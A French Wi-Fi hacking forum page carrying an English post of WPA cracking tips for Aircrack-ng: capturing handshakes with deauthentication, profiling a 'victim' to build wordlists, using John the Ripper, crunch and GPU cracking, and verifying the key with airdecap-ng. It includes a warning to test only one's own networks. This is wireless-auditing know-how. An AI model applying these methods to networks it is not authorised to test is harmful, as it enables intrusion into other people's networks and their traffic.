Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  


Visitez la boutique, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-02-2012 02:00:46

[email protected] (Mister_X)

Re : [Aircrack-ng] WPA cracking tips and tricks

WPA cracking is at the same time easy and hard to crack. It is quite easy because all you need is getting the handshake (with WEP, you need a lot of data frames). It is hard because getting the handshake can be tricky and also because cracking can take a lot of time (due to passphrase length, 8 to 63 characters).

Important notes:
Never forget to read the documentation in the wikiDon't hack AP you don't own or if you don't have the permission to do it.

There are several things to consider when getting the handshake:
You need to be somehow close to both the AP and the client. If you only have the client, you should use airbase-ng to get the client to connect to you.If RXQ is below 70 then there is a good chance you'll get a partial handshake which will be unusable. You MUST be on the same channel as the AP (in airodump-ng, you will see RXQ column when on a fixed channel)It is not necessary to keep deauthenticating the client, once or twice should be more than enough. And let the client reconnect in order to get the handshake. Each aireplay-ng tells you it sent deauthentication, it sent 128 or 256 deauth frames. If you still don't get the handshake after reading the wiki and those tips, then you might want to have a look at WPA Packet Capture Explained tutorial in the wiki to help understand what's going on.

Tip: It is always a good idea to clean up the capture to include one beacon the handshake before cracking it or submitting it to an online cracking service. The reason is that YOU select the handshake to crack and don't let the tool on those services to select the handshake (that might be the wrong one).

It might sound funny but it is true, there is 0% chances to crack it if the passphrase is not in the dictionary (and 100% when it is in the dictionary). So what you want to do is profiling your victim when cracking the handshake to include words/phrases related to it. You can also find a few tools on backtrack such as John The Ripper that will help you mangle the dictionary and "add" new words.
If you need to generate phrases such as number, check out 'crunch'.
Note that aircrack-ng doesn't mangle the wordlist and doesn't do any permutation, it just tries each passphrase against the handshake. And in case you want to be able to 'pause' the cracking, use John The Ripper to output to stdout and pipe the results to aircrack-ng (using -w -).
GPU cracking makes cracking much faster. One of the best solution for that is oclHashcat-plus (and it is much faster than pyrit).

Now that you've cracked the handshake, you might want to verify it. People have been trying to connect to the AP but it is the wrong way of checking since there are a lot of variables involved (such as distance, mac filtering, bad drivers, etc) that will prevent you to connect even if the passphrase is valid.
So what you have to do is using airdecap-ng.
With WPA, since what you get with the handshake is a session key for a specific device, you can only decrypt the traffic after the handshake for that device. Don't be fooled by airdecap-ng giving 0 frames decrypted when there are a few data frames encrypted with WPA, there might not be any traffic from that device after the handshake. Hence why it is very important to be able to understand a capture file.7538555703405721380-5143396854085239587? … ssues.html


Visitez la boutique, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
[Aircrack-ng] Lesser known features of Aircrack-ng par [email protected] (Mister_X)
0 432 27-03-2017 21:31:28 par [email protected] (Mister_X)
[Aircrack-ng] iw monitor mode flags par [email protected] (Mister_X)
0 368 21-02-2017 06:47:25 par [email protected] (Mister_X)
aircrack-ng par baltigor
2 464 30-11-2016 20:46:48 par koala
Aircrack Clé WPA incorrect !!! par Youbix  [ 1 2 ]
25 1179 12-08-2016 11:53:18 par Seska
Failed Aircrack-ng par regard48  [ 1 2 ]
30 1692 13-07-2016 20:42:42 par Fab955

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   |   

Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]